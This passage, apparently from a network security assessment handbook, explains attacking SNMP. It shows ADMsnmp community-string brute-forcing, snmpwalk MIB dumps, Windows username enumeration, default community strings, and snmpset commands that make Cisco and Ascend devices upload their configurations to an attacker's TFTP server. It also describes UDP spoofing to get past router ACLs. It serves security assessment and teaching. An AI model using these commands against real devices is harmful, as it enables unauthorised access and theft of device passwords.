5.6 SNMP

The Simple Network Management Protocol (SNMP) service listens on UDP port 161. SNMP is often found running on network infrastructure devices such as managed switches, routers, and other appliances. Increasingly, SNMP can be found running on Unix-based and Windows servers for central network management purposes.

SNMP authentication is very simple and is sent across networks in plaintext. SNMP Management Information Base (MIB) data can be retrieved from a device by specifying the correct read community string, and SNMP MIB data can be written to a device using the correct write community string. MIB databases contain listings of Object Identifier (OID) values, such as routing table entries, network statistics, and details of network interfaces. Accessing a router MIB is useful when performing further network reconnaissance and mapping.

Two useful tools used by attackers and security consultants alike for brute-forcing SNMP community strings and accessing MIB databases are ADMsnmp and snmpwalk.

5.6.1 ADMsnmp

ADMsnmp is available from the ADM group home page at http://adm.freelsd.net/ADM/. The utility is an effective Unix command-line SNMP community string brute-force utility. Example 5-13 shows the tool in use against a Cisco router at 192.168.0.1 to find that the community string private has write access.

Example 5-13. ADMsnmp used to brute-force SNMP community strings

# ADMsnmp 192.168.0.1 ADMsnmp vbeta 0.1 (c) The ADM crew ftp://ADM.isp.at/ADM/ greets: !ADM, el8.org, ansia >>>>>>>>>>> get req name=root  id = 2 >>>>>>>>>>> >>>>>>>>>>> get req name=public   id = 5 >>>>>>>>>>> >>>>>>>>>>> get req name=private  id = 8 >>>>>>>>>>> >>>>>>>>>>> get req name=write  id = 11 >>>>>>>>>>> <<<<<<<<<<< recv snmpd paket id = 9 name = private ret =0 <<<<<<<<< >>>>>>>>>>>> send setrequest id = 9 name = private >>>>>>>> >>>>>>>>>>> get req name=admin  id = 14 >>>>>>>>>>> <<<<<<<<<<< recv snmpd paket id = 10 name = private ret =0 <<<<<<<< >>>>>>>>>>> get req name=proxy  id = 17 >>>>>>>>>>> <<<<<<<<<<< recv snmpd paket id = 140 name = private ret =0 <<<<<<< >>>>>>>>>>> get req name=ascend  id = 20 >>>>>>>>>>> <<<<<<<<<<< recv snmpd paket id = 140 name = private ret =0 <<<<<<< >>>>>>>>>>> get req name=cisco  id = 23 >>>>>>>>>>> >>>>>>>>>>> get req name=router  id = 26 >>>>>>>>>>> >>>>>>>>>>> get req name=shiva  id = 29 >>>>>>>>>>> >>>>>>>>>>> get req name=all private  id = 32 >>>>>>>>>>> >>>>>>>>>>> get req name= private  id = 35 >>>>>>>>>>> >>>>>>>>>>> get req name=access  id = 38 >>>>>>>>>>> >>>>>>>>>>> get req name=snmp  id = 41 >>>>>>>>>>> <!ADM!>         snmp check on pipex-gw.trustmatta.com       <!ADM!> sys.sysName.0:pipex-gw.trustmatta.com name = private write access

5.6.2 snmpwalk

The snmpwalk utility is part of the Net-SNMP (previously UCD-SNMP) suite of tools available from http://net-snmp.sourceforge.net. The Net-SNMP toolkit can be built on both Unix and Windows platforms and contains other useful utilities including snmpset, which can modify and set specific OID values. snmpwalk is used with a valid community string to download the entire MIB database from the target device (unless a specific OID value to walk is provided by the user).

Example 5-14 shows snmpwalk being used to download the MIB database from a Cisco router. The MIB in this example is over seven pages in length, so for brevity, only the first eight OID values are presented here.

Example 5-14. Accessing the MIB using snmpwalk

# snmpwalk -c public 192.168.0.1 system.sysDescr.0 = Cisco Internetwork Operating System Software IOS (tm) C2600 Software (C2600-IS-M), Version 12.0(6), RELEASE SOFTWARE (fc1) Copyright (c) 1986-1999 by cisco Systems, Inc. Compiled Wed 11-Aug-99 00:16 by phanguye system.sysObjectID.0 = OID: enterprises.9.1.186 system.sysUpTime.0 = Timeticks: (86128) 0:14:21.28 system.sysContact.0 =  system.sysName.0 = pipex-gw.trustmatta.com system.sysLocation.0 =  system.sysServices.0 = 78 system.sysORLastChange.0 = Timeticks: (0) 0:00:00.00

5.6.3 Default Community Strings

Most routers, switches, and wireless access points from Cisco, 3Com, Foundry, D-Link, and other companies use public and private as their respective default read and write SNMP community strings. The community string list provided with the ADMsnmp brute-force program includes cisco, router, enable, admin, read, write, and other obvious values. When assessing routers or devices belonging to a specific organization, you should tailor your list accordingly (including the company name and other values that may be used in that instance).

Many Cisco routers have two default SNMP community strings embedded into them: cable-docsis and ILMI. These strings don't appear in the IOS config files, and you should review the process in the official Cisco security advisory at http://www.cisco.com/warp/public/707/ios-snmp-community-vulns-pub.shtml to remove these default community strings.

5.6.4 Compromising Devices by Reading from SNMP

Many Windows NT and 2000 servers run SNMP services, using the community string of public for read access. By walking through the 1.3.6.1.4.1.77.1.2.25 OID within a Windows NT or 2000 server, you can enumerate usernames of active accounts on the target host; 192.168.0.251 is used in Example 5-15.

Example 5-15. Enumerating Windows 2000 user accounts through SNMP

# snmpwalk -c public 192.168.102.251 .1.3.6.1.4.1.77.1.2.25 enterprises.77.1.2.25.1.1.101.115.115 = "Chris" enterprises.77.1.2.25.1.1.65.82.84.77.65.78 = "IUSR_CARTMAN" enterprises.77.1.2.25.1.1.65.82.84.77.65.78 = "IWAM_CARTMAN" enterprises.77.1.2.25.1.1.114.97.116.111.114 = "Administrator" enterprises.77.1.2.25.1.1.116.85.115.101.114 = "TsInternetUser" enterprises.77.1.2.25.1.1.118.105.99.101.115 = "NetShowServices"

In this example, the usernames Chris and Administrator are identified, along with the built-in Windows IUSR_hostname, IWAM_hostname, TsInternetUser, and NetShowServices users.

Various wireless access points and other hardware appliances contain passwords and details of writable community strings within the accessible MIB. You should check each OID value in the MIB databases of these devices because sensitive information can be easily obtained.

SNMP OID values can be fed to tools such as snmpwalk in both numerical and word form. Table 5-2 lists values that are useful when enumerating services and open shares of Windows NT family servers found running SNMP.

5.6.5 Compromising Devices by Writing to SNMP

It is possible to compromise a Cisco IOS or Ascend device running SNMP if you have write access to the SNMP MIB. By first running a TFTP server on an accessible host, you can modify particular OID values on the target device over SNMP (using snmpset), so that the device configuration file containing direct access passwords can be uploaded through TFTP. Here are some examples of this attack against Cisco IOS and Ascend network devices:

Compromising a Cisco device using snmpset:

# snmpset -r 3 -t 3 192.168.0.1 private .1.3.6.1.4.1.9.2.1.55.192.\     168.0.50 s "cisco-config"

Compromising an Ascend device using snmpset:

# snmpset -r 3 -t 3 192.168.0.254 private .1.3.6.1.4.1.529.9.5.3.0\     a "192.168.0.50" # snmpset -r 3 -t 3 192.168.0.254 private .1.3.6.1.4.1.529.9.5.4.0\     s "ascend-config"

For these attacks to work, you must install and configure an accessible TFTP server to which the appliance can upload its configuration file. This can be achieved from a Unix-based platform by modifying the /etc/inetd.conf file to run tftpd from inetd, or by using a Windows TFTP server, such as the Cisco TFTP Server (available from http://www.cisco.com/pcgi-bin/tablebuild.pl/tftp). One key point to remember when performing this exploit is to ensure your TFTP server is writable so that the target device can upload its configuration file!

SNMP running on hardware appliances can be imaginatively abused by writing to a plethora of different OID values (e.g., modification of routing tables or uploading new firmware and configuration files). It is often best to test SNMP attacks in a lab environment before performing them on live networks, to avoid crashing routers, switches, and other critical infrastructure devices.

A damaging extension to attacks involving writing to remote devices via SNMP is to use UDP spoofing. If the SNMP service listening on the target router doesn't respond to packets sent from the attacker's Internet-based hosts, he can spoof the snmpset command string (as in the previous command-line examples) to appear from a trusted host, such as an external firewall IP address. Obviously, he would need to find the correct community string, but it certainly is an imaginative way around the host-based ACLs of the router.

5.6.6 SNMP Process-Manipulation Vulnerabilities

SNMP services running as part of Compaq Insight Manager and various firmware found running on hardware such as Linksys routers, Compaq, and ORiNOCO wireless access points are publicly known to be vulnerable to various simple and complex process-manipulation attacks.

In February 2002, CERT issued an advisory detailing multiple vulnerabilities in many SNMP implementations, accessible at http://www.cert.org/advisories/CA-2002-03.html. On Solaris and Unix-based platforms, at least, these vulnerabilities resulted in compromises occurring. Many operating systems and software suites were affected, including systems from the following vendors:

• Cisco Systems

• Cray

• F5 Networks

• Hewlett-Packard

• IBM

• Microsoft

• Oracle

• Sun Microsystems

For current information relating to known SNMP issues, search the MITRE CVE list or check sites such as CERT or ISS X-Force. At the time of writing, the CERT knowledge base at http://www.kb.cert.org/vuls/ lists several remotely exploitable vulnerabilities in SNMP (not including denial of service or locally exploitable bugs), as shown in Table 5-3.